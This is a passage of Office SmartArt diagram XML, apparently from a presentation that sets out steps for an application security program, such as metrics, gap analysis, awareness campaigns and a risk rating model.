            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> data captured. Metrics include adherence to security practices / activities, vulnerabilities introduced,</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> Analyze data from the implementation and verification activities to look for root cause and</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000"/>
            <a:t> vulnerability patterns to drive strategic and systemic improvements across the enterprise. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Learn from mistakes and offer positive incentives to promote improvements.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" type="parTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}" type="sibTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Conduct a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> improvement areas and an execution plan. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D76988-94EC-456A-9326-82A5AA778D9E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Gain management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>application security awareness campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> for the entire</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> IT organization.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="1000" b="0" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" type="parTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}" type="sibTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" type="parTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}" type="sibTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABA88485-4799-4A3E-A395-465F2466FC90}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> of your organization's tolerance for risk. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" u="sng" noProof="0" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" type="parTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}" type="sibTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84E62741-DE92-5D48-8E11-F5450775D2EB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and drive adoption. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5330F5FD-52B0-144C-814A-D62027712440}" type="parTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C02DB81-333D-C748-8AF4-65359B719E74}" type="sibTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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5" custScaleX="29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5" custScaleY="104600">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5" custScaleY="102041">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5" custScaleY="101015">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="104312">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="102041">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9478E13A-DF1E-ED49-B6C0-4CD064367697}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98A34C67-44A9-4549-AA2A-CA6F6EDBEB03}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73DAC175-225C-4995-9056-E10EE015E040}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{469E487E-F0E4-4400-AA39-3813DAC2D493}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" srcOrd="3" destOrd="0" parTransId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" sibTransId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}"/>
    <dgm:cxn modelId="{F34BF083-B836-4506-BB3B-F0A01920D227}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="3" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{47978A9A-6752-440E-A60A-B6074541D436}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" srcOrd="1" destOrd="0" parTransId="{5330F5FD-52B0-144C-814A-D62027712440}" sibTransId="{2C02DB81-333D-C748-8AF4-65359B719E74}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{ABA88485-4799-4A3E-A395-465F2466FC90}" srcOrd="1" destOrd="0" parTransId="{69D2C3E2-C6D1-4586-8000-17E989285CF4}" sibTransId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}"/>
